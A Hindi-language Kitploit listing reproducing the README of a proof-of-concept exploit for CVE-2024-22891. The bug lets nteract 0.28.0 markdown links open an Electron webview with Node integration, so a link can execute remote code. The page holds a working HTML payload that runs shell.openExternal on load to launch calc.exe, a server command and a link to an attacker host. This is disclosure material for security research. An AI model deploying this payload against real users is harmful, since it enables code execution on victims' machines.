Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-22891 — nteract 0.28.0 ओपन रीडायरेक्ट से RCE एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2024-22891
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubeqstlab/cve-2024-22891

CVE-2024-22891

nteract 0.28.0 ओपन रीडायरेक्ट से RCE एक्सप्लॉइट

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Nteract PoC

CVE-2024-22891 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।

nteract 0.28.0 मार्कडाउन लिंक के माध्यम से इलेक्ट्रॉन वेबव्यू की अनुमति देता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है।

इस रिपॉजिटरी में एक उदाहरण भेद्य अनुप्रयोग और इसका प्रूफ-ऑफ-कॉन्सेप्ट (POC) शोषण है। POC के रूप में एक पायथन फ़ाइल है जो प्रक्रिया को स्वचालित करती है।

1. भेद्यता अवलोकन:

  • भेद्यता विषय: मार्कडाउन लिंक RCE
  • भेद्यता प्रकार: अन्य: खुला पुनर्निर्देशन
  • समस्या का प्रकटीकरण: इलेक्ट्रॉन वेबव्यू
  • प्रभावित घटक: मार्कडाउन
  • हमले का प्रकार: रिमोट कोड निष्पादन
  • हमले के वेक्टर: भेद्यता का शोषण करने के लिए, किसी को लिंक पर क्लिक करना होगा या साझा प्रोजेक्ट के लिंक तक पहुंचना होगा।
  • आरक्षित CVE संख्या: CVE-2024-22891

2. भेद्यता का कारण:

  • nteract 0.28.0 मार्कडाउन लिंक के माध्यम से इलेक्ट्रॉन वेबव्यू की अनुमति देता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है (क्योंकि webPreferences में nodeIntegration सत्य है)।

  • शोषण स्पष्टीकरण

    • एप्लिकेशन के भीतर मार्कडाउन के माध्यम से लिंक उत्पन्न करते समय, यह इलेक्ट्रॉन के माध्यम से एक वेबव्यू बनाता है, जो लिंक तक बाहरी पहुंच की अनुमति देता है। परिणामस्वरूप, एक हमलावर हमलावर के सर्वर की ओर जाने वाले लिंक से कनेक्ट करके रिमोट कोड निष्पादन (RCE) प्राप्त कर सकता है।

प्रूफ-ऑफ-कॉन्सेप्ट (POC)

चरण 1) हमलावर openExternal() फ़ंक्शन का उपयोग करके calc.exe लॉन्च करने के लिए स्रोत कोड के लिए सर्वर बनाता है।

root@kitploit:~
<html>
<head>
    <title>jruru Link</title>
</head>
<body>
    <a id="jruruLink">jruru Link</a>

    <script>
         // Script function definition
        function openExternal() {
            try {
                const { shell } = require('electron');
                shell.openExternal('file:C:/Windows/System32/calc.exe');
            } catch(e) {
                alert('JRURU - External link cannot be opened.');
                console.error(e);
            }
        }
        // Automatically execute openExternal function after the page is loaded
        document.addEventListener('DOMContentLoaded', function() {
            openExternal();
        });
    </script>
</body>
</html>

नोट: ※ यदि आप इसे जल्दी से परीक्षण करना चाहते हैं, तो निम्नलिखित कोड के साथ हमलावर के पीसी पर एक सर्वर बनाएं।

root@kitploit:~
$ python -m http.server 80

चरण 2) पीड़ित के सिस्टम पर nteract एप्लिकेशन निष्पादित करें और एक मार्कडाउन लिंक बनाएं, या उदाहरण कोड के रूप में हमलावर की ipynb फ़ाइल साझा करें। फिर, calc.exe निष्पादित करें।

root@kitploit:~
[Read This] (http://[attcker_adress]/shard_data.html)

neteract nteract2


3. अतिरिक्त जानकारी

फ़ाइल साझाकरण के माध्यम से .ipynb फ़ाइल निष्पादित करते समय सावधान रहें क्योंकि लिंक दिखाई नहीं दे सकता है। यह calc.exe कोई भी स्थानीय या रिमोट दुर्भावनापूर्ण पेलोड हो सकता था जो हमलावर को पीड़ित के सिस्टम तक पूर्ण पहुंच दे सकता था।

टूल डाउनलोड करें